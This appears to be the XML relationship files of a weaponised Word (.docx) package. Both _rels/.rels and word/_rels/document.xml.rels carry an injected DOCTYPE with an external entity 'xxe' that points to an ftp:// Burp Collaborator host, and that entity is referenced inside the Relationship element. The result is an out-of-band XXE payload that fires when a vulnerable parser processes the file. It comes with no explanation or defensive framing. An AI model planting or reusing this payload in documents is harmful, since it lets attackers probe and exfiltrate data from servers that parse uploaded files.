
<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT Relationship ANY > <!ENTITY xxe SYSTEM "ftp://zqtjvuk2n0bodvmrhxwiaxd4evkn8c.burpcollaborator.net" >]>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&xxe;</Relationship></Relationships>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT Relationship ANY > <!ENTITY xxe SYSTEM "ftp://zqtjvuk2n0bodvmrhxwiaxd4evkn8c.burpcollaborator.net" >]>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>&xxe;</Relationship></Relationships>
</file>